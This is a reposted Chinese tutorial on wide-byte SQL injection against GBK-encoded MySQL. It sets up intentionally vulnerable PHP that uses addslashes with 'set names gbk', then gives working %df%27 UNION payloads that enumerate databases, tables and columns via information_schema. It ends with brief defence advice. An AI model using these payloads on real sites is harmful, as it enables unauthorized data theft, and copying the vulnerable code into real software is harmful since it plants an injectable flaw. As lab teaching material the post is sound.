sql注入之宽字节注入

宽字节注入是因为数据库使用了GBK编码,不过现在大都使用unicode国际编码,大多数网站都使用了utf-8的编码

不过既然是sql注入的一部分,也搭建环境  做做实验

实验环境:

wamp集成包

实验说明:

创建使用GBK编码的数据库

实验步骤:

使用phpmyadmin进行创建数据库的时候,如果不去选择编码格式,默认会使用latin1_swedish_ci 格式

查了一下 ,和GBK类似,那就这个吧。。。

使用默认编码,创建数据库后继续创建表格

《sql注入之宽字节注入》 latin1_swedish_ci

这里需要注意的是,使用latin1_swedish_ci 格式进行创建表,插入数据时

当插入汉字的时候,提示编码问题

难怪现在的大多网站都使用utf-8编码

《sql注入之宽字节注入》 格式问题

修改字段的编码格式   可插入汉字

继续编写php漏洞代码

<?php

header(“Content-type:text/html;charset=utf-8”);

$id=@$_GET[‘id’];

if(isset($id)&&!empty($id)){

$id = addslashes($_GET[‘id’]);//进行转义

$conn=mysql_connect(‘localhost’,’root’,”)  or  die  (“false”);

mysql_select_db(“tests”,$conn);

mysql_query(“set names ‘gbk’ “,$conn);//指明数据库gbk处理,不安全的编码格式

$sql = “select * from test where id='”.$id.”‘”;

$result = mysql_query($sql, $conn);

while ($row=@mysql_fetch_array($result)){

echo “用户名:”.$row[‘name’].”<hr/>”;

//echo “密码:”.$row[‘password’].”<nr/>”;

}

mysql_close($conn);

print_r(‘执行SQL语句:’.$sql);

}else{

echo  “id  错误”;

}

?>

进行访问   注入   测试

《sql注入之宽字节注入》 addslashes的转义

发现已经被转义了,使用%df  ‘ 进行注入

《sql注入之宽字节注入》

继续注入   %df%27 union select  1,2,3   #

注意URL编码问题

《sql注入之宽字节注入》 注入成功

以下为URL编码:

%27———单引号

%20———-空格

%23———–#号

%5c————/反斜杠

为什么可以注入成功?

修改一下   header  改为gbk

header(“Content-type:text/html;charset=gbk”);

再次查看

《sql注入之宽字节注入》 反斜杠神奇消失

为什么反斜杠变成  運  这个玩意啦?

id=1′———->id=1\’———>id=1%5c%27

id=1%df’———id=1%df%5c%27———->id=1%DF5C%27——–>id=1運’

其实就是利用gbk是多字节的编码,两个字节代表一个汉字

%df    %5c   组合出了一个  運 字

因此  可以注入

《sql注入之宽字节注入》 success

扩展:

爆出所有的数据库名

payload:

id=%df%27%20union%20select%201,schema_name,3%20from%20information_schema.schemata%20limit%206,5%20%23

《sql注入之宽字节注入》 数据库名

爆出数据库中的数据表

payload:

id=%df%27%20union%20select%201,table_name,3%20from%20information_schema.tables%20where%20table_schema=0x64767761%20limit%200,61%20%23

dvwa的十六进制编码为0x64767761

《sql注入之宽字节注入》 所有数据表

爆出指定数据库的字段

payload:

id=%df%27%20union%20select%201,column_name,3%20from%20information_schema.columns%20where%20table_schema=0x64767761%20and%20table_name=0x61646D696E%20limit%200,61%20%23

《sql注入之宽字节注入》 爆出字段

注意使用十六进制

table_schema=0x64767761(dvwa)  and  table_name=0x61646D696E(admin)

根据以上信息,可进行mysql的跨库查询,查询任意数据库的任意信息

《sql注入之宽字节注入》 可查询信息

防御:

1.使用mysql_set_charset(utf8)指定字符集

2. 使用mysql_real_escape_string进行转义

    原文作者:CSeroad
    原文地址: https://www.jianshu.com/p/4fe931da9550
    本文转自网络文章,转载此文章仅为分享知识,如有侵权,请联系博主进行删除。
点赞